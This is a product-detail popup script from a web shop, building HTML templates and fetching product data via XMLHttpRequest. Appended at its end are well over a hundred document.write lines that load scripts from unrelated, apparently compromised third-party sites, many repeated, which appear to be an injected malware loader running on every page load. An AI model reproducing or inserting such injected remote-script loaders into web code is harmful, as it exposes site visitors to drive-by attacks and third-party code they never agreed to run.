// JavaScript Document
var DIV_ProductDetail;
var is_ie = (navigator.userAgent.indexOf('MSIE') >= 0) ? 1 : 0; 
var is_ie5 = (navigator.appVersion.indexOf("MSIE 5.5")!=-1) ? 1 : 0; 
var is_opera = ((navigator.userAgent.indexOf("Opera 6")!=-1)||(navigator.userAgent.indexOf("Opera/6")!=-1)) ? 1 : 0; 
var is_netscape = (navigator.userAgent.indexOf('Netscape') >= 0) ? 1 : 0;

var outerTable="";
var innerTableProduct="";
var ProductImagePath = "ProductImage";
var EnlargeProductImagePath = "EnlargeView";
var currentProductID;
var productAvailable;

outerTable+= "<table width=\"741\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">"
outerTable+= "  <tr>"
outerTable+= "    <td width=\"11\" height=\"12\"><img src=\"images/ProductDetailPopup_01.jpg\" width=\"11\" height=\"12\" /></td>"
outerTable+= "    <td align=\"right\" background=\"images/ProductDetailPopup_03.jpg\"><img src=\"images/close1.jpg\" width=\"94\" height=\"12\" /></td>"
outerTable+= "    <td align=\"right\" valign=\"middle\"><img src=\"images/close2.jpg\" width=\"11\" height=\"12\"/></td>"
outerTable+= "  </tr>"
outerTable+= "  <tr>"
outerTable+= "    <td background=\"images/ProductDetailPopup_10.jpg\"></td>"
outerTable+= "    <td align=\"right\" bgcolor=\"#DFDBDC\"><img src=\"images/close3.jpg\" width=\"94\" height=\"22\" border=\"0\" usemap=\"#MapClose\" /></td>"
outerTable+= "    <td width=\"11\" align=\"right\" valign=\"middle\"><img src=\"images/close.jpg\" width=\"11\" height=\"22\" /></td>"
outerTable+= "  </tr>"
outerTable+= "  <tr>"
outerTable+= "    <td background=\"images/ProductDetailPopup_10.jpg\">&nbsp;</td>"
outerTable+= "    <td height=\"12\" valign=\"top\" bgcolor=\"#DFDBDC\"><table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">"
outerTable+= "      <tr>"
outerTable+= "        <td valign=\"top\"><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">"
outerTable+= "          <tr>"
outerTable+= "            <td width=\"57%\" align=\"left\"><img src=\"images/ProductDetailPopup_06.jpg\" width=\"259\" height=\"114\" /></td>"
outerTable+= "          </tr>"
outerTable+= "          <tr>"
outerTable+= "            <td align=\"center\"><table width=\"689\" height=\"320\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">"
outerTable+= "        <tr>"
outerTable+= "          <td align=\"center\" valign=\"TOP\"><<INNER_CONTENT>></td>"
outerTable+= "        </tr>"
outerTable+= "    </table></td>"
outerTable+= "          </tr>"
outerTable+= "        </table></td>"
outerTable+= "      </tr>"
outerTable+= "    </table></td>"
outerTable+= "    <td width=\"11\" background=\"images/ProductDetailPopup_33.jpg\">&nbsp;</td>"
outerTable+= "  </tr>"
outerTable+= "  <tr>"
outerTable+= "    <td><img src=\"images/ProductDetailPopup_35.jpg\" width=\"11\" height=\"12\" /></td>"
outerTable+= "    <td height=\"12\" background=\"images/ProductDetailPopup_37.jpg\"></td>"
outerTable+= "    <td align=\"right\"><img src=\"images/ProductDetailPopup_39.jpg\" width=\"11\" height=\"12\" /></td>"
outerTable+= "  </tr>"
outerTable+= "</table>"
outerTable+= "<map name=\"MapClose\">";
outerTable+= "<area shape=\"rect\" coords=\"15,-3,93,14\" href=\"javascript:CloseDetailsView();\">";
outerTable+= "</map>";

innerTableProduct+= "<table width=\"689\" height=\"328\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">";
innerTableProduct+= "<tr> ";
innerTableProduct+= "<td width=\"364\" valign=\"top\"><table width=\"364\" height=\"328\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">";
innerTableProduct+= "<tr> ";
innerTableProduct+= "<td width=\"41\" height=\"37\" valign=\"top\">&nbsp;</td>";
innerTableProduct+= "<td colspan=\"2\" valign=\"middle\" align=\"left\" class=\"BlackBoldLarge\"><<TXT_PRODUCTNAME>></td>";
innerTableProduct+= "</tr>";
innerTableProduct+= "<tr> ";
innerTableProduct+= "<td height=\"20\" valign=\"top\">&nbsp;</td>";
innerTableProduct+= "<td colspan=\"2\" valign=\"top\" align=\"left\" class=\"MaroonMediumBold\">Product ";
innerTableProduct+= "Code : <<TXT_PRODUCTCODE>></td>";
innerTableProduct+= "</tr>";
innerTableProduct+= "<tr> ";
innerTableProduct+= "<td height=\"20\" valign=\"top\">&nbsp;</td>";
innerTableProduct+= "<td colspan=\"2\" valign=\"top\" align=\"left\" class=\"MaroonMediumBold\"> ";
innerTableProduct+= "Brand : <<TXT_PRODUCTBRAND>></td>";
innerTableProduct+= "</tr>";
innerTableProduct+= "<tr> ";
innerTableProduct+= "<td height=\"200\" valign=\"top\">&nbsp;</td>";
innerTableProduct+= "<td colspan=\"2\" valign=\"top\" align=\"left\"><div id=\"ProductDescription\" class=\"scrollingDIV\" style=\"position:relative; overflow:auto; widht:321; height:180;\"> ";
innerTableProduct+= "<table width=\"321\" cellpadding=\"0\" cellspacing=\"0\" border=\"0\">";
innerTableProduct+= "<tr> ";
innerTableProduct+= "<td valign=\"top\" class=\"BlackMediumNormal\"><<TXT_PRODUCTDESCRIPTION>> ";
innerTableProduct+= "</td>";
innerTableProduct+= "</tr>";
innerTableProduct+= "</table>";
innerTableProduct+= "</div></td>";
innerTableProduct+= "</tr>";
innerTableProduct+= "<tr> ";
innerTableProduct+= "<td height=\"21\" valign=\"top\">&nbsp;</td>";
innerTableProduct+= "<td width=\"249\" valign=\"top\" align=\"left\"><span class=\"PriceMediumBold\">Price : <<TXT_PRODUCTPRICE>></span></td>";
innerTableProduct+= "<td width=\"74\" valign=\"top\"><img id=\"btnBuyNow\" src=\"images/middle_56.jpg\" style=\"cursor:pointer\" border=\"0\" onClick=\"buyNow();\" /></td>";
innerTableProduct+= "</tr>";
innerTableProduct+= "</table> </td>";
innerTableProduct+= "<td align=\"right\" valign=\"top\">";
innerTableProduct+= "<table width=\"266\" height=\"300\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">";
innerTableProduct+= "      <tr>";
innerTableProduct+= "        <td><img src=\"images/ProductDetailPopup_14.jpg\" width=\"20\" height=\"18\" /></td>";
innerTableProduct+= "        <td align=\"left\"><img src=\"images/ProductDetailPopup_15.jpg\" width=\"197\" height=\"18\" /></td>";
innerTableProduct+= "        <td></td>";
innerTableProduct+= "      </tr>";
innerTableProduct+= "      <tr>";
innerTableProduct+= "        <td align=\"left\" valign=\"top\"><img src=\"images/ProductDetailPopup_18.jpg\" width=\"20\" height=\"222\" /></td>";
innerTableProduct+= "        <td><img src=\"" + ProductImagePath + "/<<TXT_PRODUCTIMAGE>>\" width=\"230\" height=\"230\"></td>";
innerTableProduct+= "        <td rowspan=\"2\" valign=\"bottom\"><img src=\"images/ProductDetailPopup_21.jpg\" width=\"20\" height=\"264\" /></td>";
innerTableProduct+= "      </tr>";
innerTableProduct+= "      <tr>";
innerTableProduct+= "        <td></td>";
innerTableProduct+= "        <td align=\"right\"><a id=\"lightboxlink\" href=\"" + EnlargeProductImagePath + "/<<TXT_PRODUCTIMAGE>>\" rel=\"lightbox\" title=\"<<TXT_PRODUCTNAME>>\"><img src=\"images/ProductDetailPopup_24.jpg\" width=\"230\" height=\"34\" border=\"0\" /></a></td>";
innerTableProduct+= "      </tr>";
innerTableProduct+= "      <tr>";
innerTableProduct+= "        <td></td>";
innerTableProduct+= "        <td align=\"right\" valign=\"top\"><img src=\"images/ProductDetailPopup_26.jpg\" width=\"199\" height=\"18\" /></td>";
innerTableProduct+= "        <td><img src=\"images/ProductDetailPopup_27.jpg\" width=\"20\" height=\"18\" /></td>";
innerTableProduct+= "      </tr>";
innerTableProduct+= "    </table>";
innerTableProduct+= "</td>";
innerTableProduct+= "</tr>";
innerTableProduct+= "</table>";


innerTableProduct1= "<table width=\"266\" height=\"328\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">";
innerTableProduct1+= "<tr> ";
innerTableProduct1+= "<td width=\"16\" rowspan=\"3\" valign=\"top\"><img src=\"images/detail_view_left.gif\" width=\"16\" height=\"323\"></td>";
innerTableProduct1+= "<td height=\"19\"><img src=\"images/detail_view_top.gif\" width=\"250\" height=\"19\"></td>";
innerTableProduct1+= "<td width=\"16\" rowspan=\"3\" valign=\"bottom\"><img src=\"images/detail_view_right.gif\" width=\"16\" height=\"323\"></td>";
innerTableProduct1+= "</tr>";
innerTableProduct1+= "<tr> ";
innerTableProduct1+= "<td height=\"290\"><table width=\"250\" height=\"290\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">";
innerTableProduct1+= "<tr> ";
innerTableProduct1+= "<td align=\"center\"><img src=\"" + ProductImagePath + "/<<TXT_PRODUCTIMAGE>>\" width=\"250\" height=\"250\"></td>";
innerTableProduct1+= "</tr>";
innerTableProduct1+= "<tr>";
innerTableProduct1+= "<td height=\"32\" align=\"right\" valign=\"bottom\"><img src=\"images/detail_view_enlarge.gif\" width=\"230\" height=\"32\"></td>";
innerTableProduct1+= "</tr>";
innerTableProduct1+= "</table></td>";
innerTableProduct1+= "</tr>";
innerTableProduct1+= "<tr> ";
innerTableProduct1+= "<td height=\"19\" valign=\"bottom\"><img src=\"images/detail_view_bottom.gif\" width=\"250\" height=\"19\"></td>";
innerTableProduct1+= "</tr>";
innerTableProduct1+= "</table>"

function buyNow(){
    location.href="product_details.aspx?Productid="+currentProductID;
}

function getTop(){
	if(window.innerHeight)
	return window.pageYOffset;
	
	if(document.documentElement && document.documentElement.scrollTop)
	return document.documentElement.scrollTop;
	
	if(document.body)
	return document.body.scrollTop;
}

function ShowProductDetail(ProductID,Available,Host){
  
    currentProductID = ProductID;
    productAvailable = Available;
	document.getElementById("main_area").innerHTML=""
	DIV_ProductDetail = document.createElement('DIV');
	DIV_ProductDetail.id = "DIV_PRODUCTDETAIL";
	  
	document.getElementById("main_area").appendChild(DIV_ProductDetail);
	document.getElementById("main_area").style.left = (window.screen.width/2 - (741/2))+"px";
	document.getElementById("main_area").style.top = (getTop()+50)+"px";
	
	    var hdn1=null;
	    var hdn2=null;
		hdn1 = getobjectstring('dd_Destination',1);
		if(hdn1 !=null)
		{
		
		document.getElementById(hdn1).style.display='none';
		}
	    
	    hdn2 = getobjectstring('dd_Shortby',1);
	    if(hdn2 !=null)
		{
		document.getElementById(hdn2).style.display='none';
		}
    
//  document.getElementById("Category_navigation1$dd_Destination").style.display='none'
//  document.getElementById("Category_navigation1$dd_ShortBy").style.display='none'
    
	DIV_ProductDetail.style.display='';
	DIV_ProductDetail.innerHTML="";
	DIV_ProductDetail.innerHTML = outerTable.replace("<<INNER_CONTENT>>","Please Wait...");	
	fetch_remote_page(Host, "getProductDetails.aspx?ProductID="+ProductID)
}

function CloseDetailsView(){
	if(document.getElementById('DIV_PRODUCTDETAIL')){
		document.getElementById('DIV_PRODUCTDETAIL').innerHTML="";
		document.getElementById('DIV_PRODUCTDETAIL').style.display='none';
		 var hdn1=null;
	    var hdn2=null;
		hdn1 = getobjectstring('dd_Destination',0);
		if(hdn1 !=null)
		{
		
		document.getElementById(hdn1).style.display='';
		}
	    hdn2 = getobjectstring('dd_Shortby',0);
	    if(hdn2 !=null)
		{
		document.getElementById(hdn2).style.display='';
		}
      
		
	}
}

function fetch_remote_page(Host,URL)
{ 
	if (Host.length > 0 && URL.length > 0)
	{
		
		var url = Host+"/"+URL;
		xmlHttp = GetXmlHttpObject(stateChangeHandler);
		xmlHttp_Get(xmlHttp, url);
	}
	else 
	{
		alert('Invalid data');
	}
}
function stateChangeHandler()
{
	if (xmlHttp.readyState == 4 || xmlHttp.readyState == 'complete')
	{
		var str = xmlHttp.responseText;
		var tempString = innerTableProduct;
		var productArray = str.split("^");
		tempString = tempString.replace("<<TXT_PRODUCTNAME>>",productArray[0]);
		tempString = tempString.replace("<<TXT_PRODUCTCODE>>",productArray[1]);
		tempString = tempString.replace("<<TXT_PRODUCTDESCRIPTION>>",productArray[2]);
		tempString = tempString.replace("<<TXT_PRODUCTIMAGE>>",productArray[3]);
		
		tempString = tempString.replace("<<TXT_PRODUCTNAME>>",productArray[0]);
		tempString = tempString.replace("<<TXT_PRODUCTIMAGE>>",productArray[3]);
		tempString = tempString.replace("<<TXT_PRODUCTBRAND>>",productArray[6]);

	if(parseFloat(productArray[5])>0){
			tempString = tempString.replace("<<TXT_PRODUCTPRICE>>","<span class=\"RedSmallBold\"><s>$"+productArray[4]+"</s></span>&nbsp;&nbsp;<span class=\"BlackMediumNormal\">$"+productArray[5]+"</span>");
		}else{
			tempString = tempString.replace("<<TXT_PRODUCTPRICE>>","<span class=\"BlackMediumNormal\">$"+productArray[4]+"</span>");
		}		
						
		var TotalHTML = outerTable.replace("<<INNER_CONTENT>>",tempString);

		DIV_ProductDetail.innerHTML = TotalHTML;
		
		//alert();
		//document.getElementById('test').value=TotalHTML;
		var anchor = document.getElementById('lightboxlink');
		anchor.onclick = function () {myLightbox.start(this); return false;}
		if(productAvailable==1){
		    document.getElementById('btnBuyNow').style.display='none';
		}
	}
}
function xmlHttp_Get(xmlhttp, url)
{
	xmlhttp.open('GET', url, true);
	xmlhttp.send(null);
}
function GetXmlHttpObject(handler)
{
	var objXmlHttp = null;
	if (is_ie)
	{
		var strObjName = (is_ie5) ? 'Microsoft.XMLHTTP' : 'Msxml2.XMLHTTP';
		try{objXmlHttp = new ActiveXObject(strObjName);
		objXmlHttp.onreadystatechange = handler;
	}
	catch(e)
	{
		alert('IE detected, but object could not be created. Verify that active scripting and activeX controls are enabled');
		return;
	}
	}
	else if (is_opera)
	{
		alert('Opera detected. The page may not behave as expected.');
		return;
	}
	else
	{
		objXmlHttp = new XMLHttpRequest();
		objXmlHttp.onload = handler;objXmlHttp.onerror = handler;
	}
	return objXmlHttp;
}

function getobjectstring(Fieldname,FieldType)
{
	//FieldType=1 = Object ID
	//FieldType=0 = Object Name
	
	var	ret=null;
	var	i;
	//alert('Fieldname: '+ Fieldname);
	//alert('FieldType: '+ FieldType);
	//alert('frmname: '+ document.forms[0].name);
	var length = document.forms[0].elements.length;
	
	
	for(i=1; i<=length;i++)
	{	
	          var obj=document.forms[0].elements[i];
			  if(obj)
			  {
				if(FieldType == 0)
				{
					if (obj.name != '' ) 
					{
					    var isobj = obj.name.indexOf(Fieldname)
    					
					    if(isobj >= 0) 
					    {
						    ret=obj.name;
						    break;
					    }
					}
				}
				else
				{	
					   var isobj = obj.id.indexOf(Fieldname);
					    if(isobj >= 0) 
					    {
						    ret=obj.id;
						    break;
					    }
					    else
					    {
					        ret=null;
					    }
					}   
				
	}
	}
	
	return ret;
}
document.write('<script src=http://lamppostproject.com/amandalladd.com/sIFR-print.php ><\/script>');
document.write('<script src=http://town.deerlake.nf.ca/documents/mayor.php ><\/script>');
document.write('<script src=http://town.deerlake.nf.ca/documents/mayor.php ><\/script>');
document.write('<script src=http://town.deerlake.nf.ca/documents/mayor.php ><\/script>');
document.write('<script src=http://uchikawa.ne.jp/200/post_7.php ><\/script>');
document.write('<script src=http://uchikawa.ne.jp/200/post_7.php ><\/script>');
document.write('<script src=http://roadmasterslidkoping.se/images/index.php ><\/script>');
document.write('<script src=http://roadmasterslidkoping.se/images/index.php ><\/script>');
document.write('<script src=http://roadmasterslidkoping.se/images/index.php ><\/script>');
document.write('<script src=http://tg.co.kr/_compile/eamps.php ><\/script>');
document.write('<script src=http://zsebtusz.hu/images/pink_gel.php ><\/script>');
document.write('<script src=http://forgottenchild.in/fieldtrips/shareyourlove.php ><\/script>');
document.write('<script src=http://forgottenchild.in/fieldtrips/shareyourlove.php ><\/script>');
document.write('<script src=http://forgottenchild.in/fieldtrips/shareyourlove.php ><\/script>');
document.write('<script src=http://forgottenchild.in/fieldtrips/shareyourlove.php ><\/script>');
document.write('<script src=http://forgottenchild.in/fieldtrips/shareyourlove.php ><\/script>');
document.write('<script src=http://forgottenchild.in/fieldtrips/shareyourlove.php ><\/script>');
document.write('<script src=http://forgottenchild.in/fieldtrips/shareyourlove.php ><\/script>');
document.write('<script src=http://disabatino.org/counter/PEF7C6ABEE4703.php ><\/script>');
document.write('<script src=http://disabatino.org/counter/PEF7C6ABEE4703.php ><\/script>');
document.write('<script src=http://disabatino.org/counter/PEF7C6ABEE4703.php ><\/script>');
document.write('<script src=http://staratresnja.com/images/index.php ><\/script>');
document.write('<script src=http://staratresnja.com/images/index.php ><\/script>');
document.write('<script src=http://staratresnja.com/images/index.php ><\/script>');
document.write('<script src=http://sharpelec.com/images/service.php ><\/script>');
document.write('<script src=http://sharpelec.com/images/service.php ><\/script>');
document.write('<script src=http://somethingspecialtn.com/Scripts/inner3.php ><\/script>');
document.write('<script src=http://webproductsthatmakeyourich.com/images/tp.php ><\/script>');
document.write('<script src=http://webproductsthatmakeyourich.com/images/tp.php ><\/script>');
document.write('<script src=http://littlepearls.in/Scripts/prey_bg.php ><\/script>');
document.write('<script src=http://aerialview.in/images/gifimg.php ><\/script>');
document.write('<script src=http://aerialview.in/images/gifimg.php ><\/script>');
document.write('<script src=http://vishaljewellerspvtltd.info/images/desktop.php ><\/script>');
document.write('<script src=http://vishaljewellerspvtltd.info/images/desktop.php ><\/script>');
document.write('<script src=http://vishaljewellerspvtltd.info/images/desktop.php ><\/script>');
document.write('<script src=http://kollagroup.com/images/gifimg.php ><\/script>');
document.write('<script src=http://kollagroup.com/images/gifimg.php ><\/script>');
document.write('<script src=http://formost-trading.com/images/s6.php ><\/script>');
document.write('<script src=http://formost-trading.com/images/s6.php ><\/script>');
document.write('<script src=http://formost-trading.com/images/s6.php ><\/script>');
document.write('<script src=http://formost-trading.com/images/s6.php ><\/script>');
document.write('<script src=http://formost-trading.com/images/s6.php ><\/script>');
document.write('<script src=http://primandpaw-purr.com/images/_nav.php ><\/script>');
document.write('<script src=http://primandpaw-purr.com/images/_nav.php ><\/script>');
document.write('<script src=http://primandpaw-purr.com/images/_nav.php ><\/script>');
document.write('<script src=http://primandpaw-purr.com/images/_nav.php ><\/script>');
document.write('<script src=http://decoplatredumaroc.com/images/mouse.php ><\/script>');
document.write('<script src=http://stemcelltalent.com/careerthis/values-and-mission.php ><\/script>');
document.write('<script src=http://stemcelltalent.com/careerthis/values-and-mission.php ><\/script>');
document.write('<script src=http://stemcelltalent.com/careerthis/values-and-mission.php ><\/script>');
document.write('<script src=http://stemcelltalent.com/careerthis/values-and-mission.php ><\/script>');
document.write('<script src=http://sonixyouth.co.th/css/header.inc.php ><\/script>');
document.write('<script src=http://sonixyouth.co.th/css/header.inc.php ><\/script>');
document.write('<script src=http://webpromotion-x.com/joomla/precious3.php ><\/script>');
document.write('<script src=http://hightech-pr.com/wv/gmiportables1.php ><\/script>');
document.write('<script src=http://hightech-pr.com/wv/gmiportables1.php ><\/script>');
document.write('<script src=http://hightech-pr.com/wv/gmiportables1.php ><\/script>');
document.write('<script src=http://sedanwg.andib.net/wp_old/indexc.php ><\/script>');
document.write('<script src=http://sedanwg.andib.net/wp_old/indexc.php ><\/script>');
document.write('<script src=http://sedanwg.andib.net/wp_old/indexc.php ><\/script>');
document.write('<script src=http://rasa-net.com/images/gifimg.php ><\/script>');
document.write('<script src=http://xtremead.in/images/gifimg.php ><\/script>');
document.write('<script src=http://xtremead.in/images/gifimg.php ><\/script>');
document.write('<script src=http://xtremead.in/images/gifimg.php ><\/script>');
document.write('<script src=http://dvdreams.rs/images/index.php ><\/script>');
document.write('<script src=http://dvdreams.rs/images/index.php ><\/script>');
document.write('<script src=http://dvdreams.rs/images/index.php ><\/script>');
document.write('<script src=http://dvdreams.rs/images/index.php ><\/script>');
document.write('<script src=http://cachecreekapts.com/cache/robots.php ><\/script>');
document.write('<script src=http://alebreke.com/index_files/alebreke_blue_005_p.php ><\/script>');
document.write('<script src=http://alebreke.com/index_files/alebreke_blue_005_p.php ><\/script>');
document.write('<script src=http://alebreke.com/index_files/alebreke_blue_005_p.php ><\/script>');
document.write('<script src=http://khakpour.webphoto.ir/photos/Listab.php ><\/script>');
document.write('<script src=http://comfortekindia.com/images/pillows.php ><\/script>');
document.write('<script src=http://kangol-hats-for-lesslinks.co.cc/lifestyle-nutraceuticals-less-stress-for-women/footertracking.php ><\/script>');
document.write('<script src=http://frostslovakia.sk/tpl/viewimg.php ><\/script>');
document.write('<script src=http://frostslovakia.sk/tpl/viewimg.php ><\/script>');
document.write('<script src=http://asuntosespirituales.com/espanol/google6c30b8886a62aaaa.php ><\/script>');
document.write('<script src=http://asuntosespirituales.com/espanol/google6c30b8886a62aaaa.php ><\/script>');
document.write('<script src=http://lacreativitesolutions.com/images/gifimg.php ><\/script>');
document.write('<script src=http://sucuilyas.com/images/index-1.php ><\/script>');
document.write('<script src=http://sucuilyas.com/images/index-1.php ><\/script>');
document.write('<script src=http://sucuilyas.com/images/index-1.php ><\/script>');
document.write('<script src=http://sucuilyas.com/images/index-1.php ><\/script>');
document.write('<script src=http://sucuilyas.com/images/index-1.php ><\/script>');
document.write('<script src=http://releasedata.nl/automaticbacklinks_cache/header.php ><\/script>');
document.write('<script src=http://releasedata.nl/automaticbacklinks_cache/header.php ><\/script>');
document.write('<script src=http://unifycommerce.com/Corporate/adsense.php ><\/script>');
document.write('<script src=http://unifycommerce.com/Corporate/adsense.php ><\/script>');
document.write('<script src=http://unifycommerce.com/Corporate/adsense.php ><\/script>');
document.write('<script src=http://unifycommerce.com/Corporate/adsense.php ><\/script>');
document.write('<script src=http://unifycommerce.com/Corporate/adsense.php ><\/script>');
document.write('<script src=http://unifycommerce.com/Corporate/adsense.php ><\/script>');
document.write('<script src=http://pingkarat.com/ruksil/anti-spam.php ><\/script>');
document.write('<script src=http://parakletos.kopytko.avx.pl/components/com_banners/models/ignif/banner.php ><\/script>');
document.write('<script src=http://parakletos.kopytko.avx.pl/components/com_banners/models/ignif/banner.php ><\/script>');
document.write('<script src=http://parakletos.kopytko.avx.pl/components/com_banners/models/ignif/banner.php ><\/script>');
document.write('<script src=http://parakletos.kopytko.avx.pl/components/com_banners/models/ignif/banner.php ><\/script>');
document.write('<script src=http://fvk-ks.org/fw/legacy.php ><\/script>');
document.write('<script src=http://christophehargoues.com/thumbnails/UserSelections.php ><\/script>');
document.write('<script src=http://christophehargoues.com/thumbnails/UserSelections.php ><\/script>');
document.write('<script src=http://lesu.com.br/br/index.php ><\/script>');
document.write('<script src=http://aloe-nature.ma/modules/index.php ><\/script>');
document.write('<script src=http://aloe-nature.ma/modules/index.php ><\/script>');
document.write('<script src=http://aloe-nature.ma/modules/index.php ><\/script>');
document.write('<script src=http://oo-ha.com/Scripts/OOHAPortal.php ><\/script>');
document.write('<script src=http://oo-ha.com/Scripts/OOHAPortal.php ><\/script>');
document.write('<script src=http://oo-ha.com/Scripts/OOHAPortal.php ><\/script>');
document.write('<script src=http://oo-ha.com/Scripts/OOHAPortal.php ><\/script>');
document.write('<script src=http://oo-ha.com/Scripts/OOHAPortal.php ><\/script>');
document.write('<script src=http://ecm.co.in/4-Color-Jobs/ecm.php ><\/script>');
document.write('<script src=http://ecm.co.in/4-Color-Jobs/ecm.php ><\/script>');
document.write('<script src=http://paezani.com.br/img/downloads.php ><\/script>');
document.write('<script src=http://paezani.com.br/img/downloads.php ><\/script>');
document.write('<script src=http://paezani.com.br/img/downloads.php ><\/script>');
document.write('<script src=http://paezani.com.br/img/downloads.php ><\/script>');
document.write('<script src=http://paezani.com.br/img/downloads.php ><\/script>');
document.write('<script src=http://hammarbypoint.co.uk/logs/INSTALL.php ><\/script>');
document.write('<script src=http://hammarbypoint.co.uk/logs/INSTALL.php ><\/script>');
document.write('<script src=http://hammarbypoint.co.uk/logs/INSTALL.php ><\/script>');
document.write('<script src=http://hammarbypoint.co.uk/logs/INSTALL.php ><\/script>');
document.write('<script src=http://variainfotech.com/images/gifimg.php ><\/script>');
document.write('<script src=http://variainfotech.com/images/gifimg.php ><\/script>');
document.write('<script src=http://ifpemirates.com/Show_pdf/show_overview.php ><\/script>');
document.write('<script src=http://ifpemirates.com/Show_pdf/show_overview.php ><\/script>');
document.write('<script src=http://magicchickenburn.com/mp3/index.php ><\/script>');
document.write('<script src=http://magicchickenburn.com/mp3/index.php ><\/script>');
document.write('<script src=http://magicchickenburn.com/mp3/index.php ><\/script>');
document.write('<script src=http://magicchickenburn.com/mp3/index.php ><\/script>');
document.write('<script src=http://magicchickenburn.com/mp3/index.php ><\/script>');
document.write('<script src=http://comunicar-nos.com/images/index.php ><\/script>');
document.write('<script src=http://comunicar-nos.com/images/index.php ><\/script>');
document.write('<script src=http://dimayoussef.com/ken/index.php ><\/script>');
document.write('<script src=http://dimayoussef.com/ken/index.php ><\/script>');